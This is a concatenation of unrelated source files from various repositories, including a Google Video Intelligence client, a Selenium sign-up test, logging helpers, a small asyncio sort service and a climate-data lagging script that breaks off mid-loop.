"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "videointelligence.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
StreamingVideoIntelligenceServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
StreamingVideoIntelligenceServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> StreamingVideoIntelligenceServiceTransport:
"""Returns the transport used by the client instance.
Returns:
StreamingVideoIntelligenceServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
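    # Illustrative round trips for the path helpers above (documentation only,
    # not part of the generated surface):
    #
    #   common_location_path("my-project", "us-east1")
    #       -> "projects/my-project/locations/us-east1"
    #   parse_common_location_path("projects/my-project/locations/us-east1")
    #       -> {"project": "my-project", "location": "us-east1"}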
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, StreamingVideoIntelligenceServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the streaming video intelligence service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, StreamingVideoIntelligenceServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, StreamingVideoIntelligenceServiceTransport):
# transport is a StreamingVideoIntelligenceServiceTransport instance.
if credentials or client_options.credentials_file:
raise ValueError("When providing a transport instance, "
"provide its credentials directly.")
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=(
Transport == type(self).get_transport_class("grpc")
or Transport == type(self).get_transport_class("grpc_asyncio")
),
)
def streaming_annotate_video(self,
requests: Iterator[video_intelligence.StreamingAnnotateVideoRequest] = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[video_intelligence.StreamingAnnotateVideoResponse]:
r"""Performs video annotation with bidirectional
streaming: emitting results while sending video/audio
bytes. This method is only available via the gRPC API
(not REST).
Args:
requests (Iterator[google.cloud.videointelligence_v1p3beta1.types.StreamingAnnotateVideoRequest]):
The request object iterator. The top-level message sent by the
client for the `StreamingAnnotateVideo` method. Multiple
`StreamingAnnotateVideoRequest` messages are sent. The
first message must only contain a `StreamingVideoConfig`
message. All subsequent messages must only contain
`input_content` data.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.videointelligence_v1p3beta1.types.StreamingAnnotateVideoResponse]:
StreamingAnnotateVideoResponse is the only message returned to the client
by StreamingAnnotateVideo. A series of zero or more
StreamingAnnotateVideoResponse messages are streamed
back to the client.
"""
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.streaming_annotate_video]
# Send the request.
response = rpc(
requests,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-videointelligence",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = (
"StreamingVideoIntelligenceServiceClient",
)
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
c26b1e698d6b28cb8ba41501b866f0a0d5697daf
|
85ab389658b2fbbb0e56f35e90df35ffb7b3c6dd
|
/UI_Automation/Tests/test_A_HomePage.py
|
bdf3d6557013817996f3552a0796fb977186bae4
|
[] |
no_license
|
akashgkrishnan/Fm_Staging_automation
|
0a306ba0d931db450e3156cdbe8111f63d214889
|
5e8903226ebaa4d512f4f9c9fa581c0d8e227726
|
refs/heads/master
| 2023-05-13T05:56:02.831480 | 2020-06-03T07:11:26 | 2020-06-03T07:11:26 | 263,627,594 | 0 | 0 | null | 2021-06-02T01:50:17 | 2020-05-13T12:46:34 |
Python
|
UTF-8
|
Python
| false | false | 6,056 |
py
|
from _csv import reader
from random import randint
from csv import writer
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from UI_Automation.pageObjects.EmployerHome import EmployerHome
from UI_Automation.pageObjects.EmployerSignUp import EmployerSignUp
from UI_Automation.pageObjects.FmContactPage import FmContactPage
from UI_Automation.pageObjects.FmHomeEmployer import FmEmployerPage
from UI_Automation.pageObjects.FmHomePage import FmHomePage
from UI_Automation.pageObjects.EmployerSignInPage import SignInPage
from UI_Automation.utilities.BaseClass import BaseClass
from time import sleep
class TestFmHomePage(BaseClass):
def random_mobile(self):
return randint(1111111111, 5555555555)
def test_employer_FM_home(self):
home_page = FmHomePage(self.driver)
home_page.get_employer().click()
employer_intro = FmEmployerPage(self.driver)
employer_intro.get_request_demo().click()
sleep(2)
employer_intro.get_name_field().send_keys('Akash G Krishnan')
employer_intro.get_email_field().send_keys('[email protected]')
employer_intro.get_phone_field().send_keys('8130233807')
employer_intro.get_company_field().send_keys('KRISHNAN')
employer_intro.get_company_website_field().send_keys('www.google.co.in')
employer_intro.get_submit_demo().click()
sleep(7)
def test_contact_page(self):
home_page = FmHomePage(self.driver)
home_page.get_contact().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//h1[contains(text(),"Hello!")]'))
)
contact_page = FmContactPage(self.driver)
contact_page.get_name_field().send_keys("Akash G Krishnan")
contact_page.get_company_field().send_keys("KRISHNAN")
mobile = self.random_mobile()
contact_page.get_email_field().send_keys(str(mobile) + '@mailinator.com')
contact_page.get_phone_field().send_keys(mobile)
contact_page.get_query_field().send_keys('test script run using selenium web driver api. test script run using selenium web driver api.')
contact_page.get_submit_btn().click()
sleep(5)
assert contact_page.get_success_text().text == 'Thank You!'
def test_interviewer_landing(self):
home_page = FmHomePage(self.driver)
home_page.get_interviewer().click()
sleep(3)
def test_employer_signUp(self):
home_page = FmHomePage(self.driver)
home_page.get_employer_signUp().click()
sleep(5)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
employee_page = EmployerSignUp(self.driver)
employee_page.get_company().send_keys('Automation Company 123')
employee_page.get_fullName().send_keys('Akash G Krishnan ak')
employee_page.get_email().click()
mobile = self.random_mobile()
email = str(mobile) + '@mailinator.com'
employee_page.get_email().send_keys(email)
password = 'Testing@123'
employee_page.get_password().send_keys(password)
employee_page.get_confirm_password().send_keys(password)
        # raw string avoids the invalid "\T"/"\l" escape sequences in the Windows path
        with open(r'..\TestData\login.txt', 'a') as file:
            csv_writer = writer(file)
            csv_writer.writerow([email, password])
employee_page.get_signup_button().click()
sleep(3)
assert 'Click on the verification link to activate your account.' in employee_page.get_success_modal().text
employee_page.get_success_confirm().click()
self.driver.get('https://www.mailinator.com/')
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(mobile)
self.driver.find_element_by_xpath("//input[@id='addOverlay']").send_keys(Keys.ENTER)
self.driver.find_element_by_xpath('//tr[1]//td[3]').click()
self.driver.find_element_by_xpath("//button[contains(text(),'Show Links')]").click()
verification_url = self.driver.find_element_by_xpath("//div[@id='clicklinks']").text
self.driver.get(verification_url)
assert 'Welcome to FoxMatrix' in self.driver.find_element_by_xpath("//h2[contains(text(),'Welcome to FoxMatrix')]").text
self.driver.find_element_by_xpath("//button[contains(text(),'Go to Login')]").click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(email)
sign_in.get_password_field().send_keys(password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, "//button[contains(text(),'Setup Your Account')]"))
)
def test_employer_signIn(self):
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.XPATH, '//input[@name="email"]'))
)
        # raw string avoids the invalid "\T"/"\l" escape sequences in the Windows path
        with open(r'..\TestData\login.txt') as file:
            csv_Reader = list(reader(file))[::-1]
        self.email = csv_Reader[1][0]
        self.password = csv_Reader[1][1]
home_page = FmHomePage(self.driver)
home_page.get_employer_sign_in().click()
sleep(3)
child_window = self.driver.window_handles[-1]
self.driver.close()
self.driver.switch_to.window(child_window)
sign_in = SignInPage(self.driver)
sign_in.get_email_field().click()
sign_in.get_email_field().send_keys(self.email)
sign_in.get_password_field().send_keys(self.password)
sign_in.get_login_button().click()
WebDriverWait(self.driver, 10).until(
EC.presence_of_element_located((By.LINK_TEXT, 'Setup Your Account'))
)
|
[
"[email protected]"
] | |
600f054f49e78cf24098421655e1523203fa53d8
|
9553ebbc332975477a40be1ca3f333beff9d382c
|
/my_logger.py
|
643c3f75aeb6ba74bcc4323ad85ddf902407827c
|
[] |
no_license
|
smellycats/SX-UnionKafkaCSClient
|
f406056ac726968f71373c0199d46c73fbbbff17
|
2a1c52bdce32e7e30e2f1f23edfae89346cfa0fd
|
refs/heads/master
| 2021-09-05T04:20:48.498408 | 2017-11-28T08:54:35 | 2017-11-28T08:54:35 | 112,099,977 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,616 |
py
|
import os
import logging
import logging.handlers
def debug_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s %(filename)s[line:%(lineno)d] \
[%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def online_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
logger = logging.getLogger('root')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=20 * 1024 * 1024, backupCount=5)
logger.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
rthandler.setFormatter(formatter)
logger.addHandler(rthandler)
def access_logging(log_file_name):
"""Init for logging"""
path = os.path.split(log_file_name)
if not os.path.isdir(path[0]):
os.makedirs(path[0])
access_logger = logging.getLogger('access')
rthandler = logging.handlers.RotatingFileHandler(
log_file_name, maxBytes=100 * 1024 * 1024, backupCount=10)
access_logger.setLevel(logging.INFO)
access_logger.addHandler(rthandler)
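# A minimal usage sketch (the log path below is only an example, not part of the
# original module): initialise the rotating 'root' logger, then log through it.
if __name__ == '__main__':
    debug_logging('/tmp/kafka_cs_client/debug.log')
    logging.getLogger('root').info('logger initialised')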
|
[
"[email protected]"
] | |
5c92f6a56671d9890fb4aef4a30287078d8d5c25
|
39a9cd1d168dbd73987385f94ecb968f8eb0be80
|
/medicine/migrations/0013_remove_type_med_type.py
|
a168c64968198db356545acbe34e0105ac956892
|
[] |
no_license
|
suhaskm96/medisearch
|
dc41e05247b0dc7a72fbd26917de3b895407e27e
|
629629bcf20396a8c7ed25d384662d15ae7f1c90
|
refs/heads/master
| 2020-06-24T12:51:33.445648 | 2018-06-15T10:52:38 | 2018-06-15T10:52:38 | 198,967,048 | 1 | 0 | null | 2019-07-26T07:16:01 | 2019-07-26T07:16:00 | null |
UTF-8
|
Python
| false | false | 389 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-14 23:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('medicine', '0012_type_med_type'),
]
operations = [
migrations.RemoveField(
model_name='type',
name='med_type',
),
]
|
[
"[email protected]"
] | |
6f1601446984a091f96b9571f04aae8710b12672
|
66765829bd7bad8d56624552a2cb41d9d4576025
|
/solved/06/abc189_d.py
|
0cdaf3a023d2e406f6287f2a682022187fc5c285
|
[] |
no_license
|
murakami10/atc_python
|
9c0c935c58b55177586b0aa23a25032b59beaca8
|
98f91f43e4cbfadb35a1de250fca98ae53457023
|
refs/heads/main
| 2023-03-06T10:05:55.248376 | 2021-02-13T06:29:23 | 2021-02-13T06:29:23 | 320,210,577 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 438 |
py
|
N = int(input())
S = []
for i in range(N):
S.append(str(input()))
# ans[0][i]: number of assignments of x_0..x_i for which the expression so far is True
# ans[1][i]: number of assignments for which it is False
ans = [[0] * (N + 1) for _ in range(2)]
ans[0][0] = 1
ans[1][0] = 1
for i in range(len(S)):
    if S[i] == "AND":
        # AND stays True only when both operands are True
        ans[0][i + 1] = ans[0][i]
        ans[1][i + 1] = 2 * ans[1][i] + ans[0][i]
    else:
        # OR becomes False only when both operands are False
        ans[0][i + 1] = 2 * ans[0][i] + ans[1][i]
        ans[1][i + 1] = ans[1][i]
print(ans[0][-1])
# https://atcoder.jp/contests/abc189/tasks/abc189_d
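# A small brute-force cross-check of the DP above (illustrative only, not part
# of the submitted solution): enumerate all 2**(N+1) assignments directly.
#
#     from itertools import product
#
#     def brute_force(ops):
#         total = 0
#         for bits in product([False, True], repeat=len(ops) + 1):
#             val = bits[0]
#             for op, x in zip(ops, bits[1:]):
#                 val = (val and x) if op == "AND" else (val or x)
#             total += val
#         return total
#
#     # brute_force(["AND"]) == 1, brute_force(["OR"]) == 3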
|
[
"[email protected]"
] | |
76cae0ffbd3466e9e2f9290d4d10df7eb386ab9a
|
3a534e848c3962ccaad700bdd08bcdaa02f25ddb
|
/a4/movecircle.py
|
43b465bdd17d8e1fbccf626ca43ac4e933632acb
|
[] |
no_license
|
dragikamov/Advanced_Programming_in_Python
|
48460d3b24de46b23e289224bfc3dc06d8f364e9
|
db7491de24a54bc7dcac415fc7bd498afc3923d3
|
refs/heads/master
| 2020-04-27T13:08:24.240850 | 2019-03-07T14:18:18 | 2019-03-07T14:18:18 | 174,357,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 525 |
py
|
# 350112
# a4 1.py
# Dragi Kamov
# [email protected]
from graphics import *
def main():
win = GraphWin()
for i in range(10):
shape = Rectangle(Point(30, 30), Point(70, 70))
shape.setOutline("red")
shape.setFill("red")
shape.draw(win)
p = win.getMouse()
c = shape.getCenter()
dx = p.getX() - c.getX()
dy = p.getY() - c.getY()
shape.move(dx, dy)
win.close()
main()
|
[
"[email protected]"
] | |
660d026a4cd37bb499fea685b14e4c17e430fcc2
|
ab5cdf8f2de94c327e4679da84f941b1f3c04db4
|
/kubernetes/test/test_v1_key_to_path.py
|
bb33f64a5c5d213fb5766a93b9a0fdc02a60e156
|
[
"Apache-2.0"
] |
permissive
|
diannaowa/client-python
|
a4a92a125178db26004eaef5062f9b1b581b49a8
|
5e268fb0b6f21a535a14a7f968b84ed4486f6774
|
refs/heads/master
| 2020-12-02T22:06:03.687696 | 2017-06-30T21:42:50 | 2017-06-30T21:42:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 829 |
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_key_to_path import V1KeyToPath
class TestV1KeyToPath(unittest.TestCase):
""" V1KeyToPath unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1KeyToPath(self):
"""
Test V1KeyToPath
"""
model = kubernetes.client.models.v1_key_to_path.V1KeyToPath()
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
f3bb7cc1fd5db41d05739da7d79ff50bbc8d581e
|
7eed7e912038c9a9cdb360aa3c91ac7fcbe7d8a5
|
/Chapter13/sort_service.py
|
a7cd2466b671755179dddc5e8340fac6866caba6
|
[
"MIT"
] |
permissive
|
4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition
|
5228cc99f2e89fe9814140049ea400c29481a664
|
6310577f0a71588cf28d42994b5d9581640b5870
|
refs/heads/master
| 2023-03-27T08:42:49.488468 | 2021-03-22T03:07:47 | 2021-03-28T05:06:40 | 275,771,956 | 0 | 0 |
MIT
| 2020-06-29T08:16:50 | 2020-06-29T08:16:49 | null |
UTF-8
|
Python
| false | false | 1,099 |
py
|
import asyncio
import json
from concurrent.futures import ProcessPoolExecutor
def sort_in_process(data):
    # Gnome sort over a JSON-encoded list of numbers (runs in a worker process).
nums = json.loads(data.decode())
curr = 1
while curr < len(nums):
if nums[curr] >= nums[curr - 1]:
curr += 1
else:
nums[curr], nums[curr - 1] = nums[curr - 1], nums[curr]
if curr > 1:
curr -= 1
return json.dumps(nums).encode()
async def sort_request(reader, writer):
print("Received connection")
    length = await reader.read(8)  # 8-byte big-endian length prefix (assumes all 8 bytes arrive at once)
data = await reader.readexactly(int.from_bytes(length, "big"))
result = await asyncio.get_event_loop().run_in_executor(
None, sort_in_process, data
)
print("Sorted list")
writer.write(result)
writer.close()
print("Connection closed")
loop = asyncio.get_event_loop()
loop.set_default_executor(ProcessPoolExecutor())
server = loop.run_until_complete(
asyncio.start_server(sort_request, "127.0.0.1", 2015)
)
print("Sort Service running")
loop.run_forever()
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
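# A minimal client sketch for the service above (illustrative; the host/port
# match the server defaults and the number list is arbitrary). The wire format
# is an 8-byte big-endian length prefix followed by a JSON-encoded list.
#
#     import asyncio, json
#
#     async def sort_remotely(nums, host="127.0.0.1", port=2015):
#         reader, writer = await asyncio.open_connection(host, port)
#         payload = json.dumps(nums).encode()
#         writer.write(len(payload).to_bytes(8, "big") + payload)
#         result = json.loads(await reader.read())  # server closes after replying
#         writer.close()
#         return result
#
#     # asyncio.get_event_loop().run_until_complete(sort_remotely([3, 1, 2]))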
|
[
"[email protected]"
] | |
597e6dfa6aa66205665a9db5cf233af448ee78b7
|
e495badcd88e4f95ae99f33f8aa740d1e5e7a875
|
/0x08-python-more_classes/3-rectangle.py
|
7604bd6fe4645a74c0d2a0bee600b626b7b9c889
|
[] |
no_license
|
Immaannn2222/holbertonschool-higher_level_programming
|
059ed232af3d1ad54e4d7eff97a0dcb4d61585fb
|
1c65e5a6d3632f7e28803ebb2699229390883ec7
|
refs/heads/master
| 2022-12-17T23:42:00.632652 | 2020-09-24T18:02:12 | 2020-09-24T18:02:12 | 259,304,604 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,375 |
py
|
#!/usr/bin/python3
"""Rectangle class"""
class Rectangle:
"""Rectangle proporties"""
def __init__(self, width=0, height=0):
self.width = width
self.height = height
@property
def width(self):
return self.__width
@width.setter
def width(self, value):
if isinstance(value, int):
if value >= 0:
self.__width = value
else:
raise ValueError("width must be >= 0")
else:
raise TypeError("width must be an integer")
@property
def height(self):
return self.__height
@height.setter
def height(self, value):
if isinstance(value, int):
if value >= 0:
self.__height = value
else:
raise ValueError("height must be >= 0")
else:
raise TypeError("height must be an integer")
def area(self):
return self.__width * self.__height
def perimeter(self):
if self.__height == 0 or self.__width == 0:
return 0
return self.__width * 2 + self.__height * 2
def __str__(self):
if self.__height <= 0 or self.__width <= 0:
return ""
new_str = ""
for x in range(self.__height):
new_str += "#" * self.__width
new_str += '\n'
return new_str[:-1]
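# A short usage sketch (illustrative, not part of the original task file):
if __name__ == "__main__":
    rect = Rectangle(4, 2)
    print(rect.area())       # 8
    print(rect.perimeter())  # 12
    print(rect)              # two rows of four '#' characters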
|
[
"[email protected]"
] | |
9e6c62a0b8c8c640c66886053a78168485cff232
|
077c91b9d5cb1a6a724da47067483c622ce64be6
|
/fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs_with_max_replays_5/interreplay_35_l_3/openflow_replay_config.py
|
34b65c25622a41540245bfa018421a1f35b62a19
|
[] |
no_license
|
Spencerx/experiments
|
0edd16398725f6fd9365ddbb1b773942e4878369
|
aaa98b0f67b0d0c0c826b8a1565916bf97ae3179
|
refs/heads/master
| 2020-04-03T10:11:40.671606 | 2014-06-11T23:55:11 | 2014-06-11T23:55:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,022 |
py
|
from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow import OpenFlowReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd='./pyretic.py -m p0 pyretic.examples.firewall_for_sts_no_close', label='c1', address='127.0.0.1', cwd='../pyretic', kill_cmd='ps aux | grep -e pox -e pyretic | grep -v simulator | cut -c 9-15 | xargs kill -9')],
topology_class=MeshTopology,
topology_params="num_switches=3",
patch_panel_class=BufferedPatchPanel,
multiplex_sockets=False,
kill_controllers_on_exit=True)
control_flow = OpenFlowReplayer(simulation_config, "experiments/fuzz_pyretic_mesh_proactive_firewall_no_close_check_loop_mcs/interreplay_35_l_3/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'None'
|
[
"[email protected]"
] | |
4c54990b4fdbf3433f3e4d0b319960ecfb420659
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/lag82/563-tideGauge.py
|
edc98a675063801b2e15b98450b11705c42804f6
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,984 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Create time-lagged copies of the predictor time series
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 563
y = 564
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since ERA20C has 3hrly data
#the lag_hrs is increased from 6(eraint) to 11 (era20C)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        #dataframe that contains all lagged time series (dates only)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
            #merge the selected lagged time column with the predictor on "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
